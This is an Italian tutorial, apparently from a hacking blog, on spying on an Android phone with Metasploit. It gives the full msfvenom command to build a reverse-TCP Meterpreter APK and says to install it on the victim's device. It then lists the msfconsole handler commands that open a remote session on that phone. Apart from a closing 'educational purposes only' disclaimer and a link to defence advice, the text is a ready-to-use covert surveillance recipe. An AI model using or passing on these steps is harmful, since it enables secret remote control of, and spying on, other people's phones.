Metasploit: Come spiare un dispositivo Android

Abbiamo già parlato di Metasplot e abbiamo visto come creare una backdoor per windows.

Per Android la cosa non cambia, il funzionamento è praticamente lo stesso, dunque se hai dubbi guarda le guide precedenti.

Avviamo il terminale e dirigiamoci sulla nostra scrivania.

Adesso digitiamo il comando:

msfvenom -p android/meterpreter/reverse_tcp -a dalvik --platform android lhost=[il vostro ip] lport=[una porta] -o [nomefile].apk

Creato il nostro apk dobbiamo solo installarlo sul dispositivo della vittima.

 

 

 

 

Quante volte abbiamo ignorato questo?

 

 

 

 

 

Una volta installato avviamo la nostra console con il comando:

msfconsole

eseguiamo i seguenti comandi:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost [il tuo ip]
set lport [porta impostata prima]
run

A questo punto possiamo notare la sessione meterpreter avviata con l’ip vittima.

da adesso possiamo interagire con il dispositivo, digita il comando help per la lista completa dei comandi.

Leggi ancora a proposito di Metasploit!

Come difenderti da cose simili?? Leggi qui

ATTENZIONE: QUESTA GUIDA È STATA SCRITTA SOLO A SCOPO DIDATTICO NON MI ASSUMO NESSUNA RESPONSABILITÀ PER LE VOSTRE AZIONI ILLEGALI O DANNI CAUSATI. RICORDO CHE LA VIOLAZIONE DELLA PRIVACY E DANNI CAUSATI TRAMITE MEZZI INFORMATICI, SONO PUNITI PENALMENTE!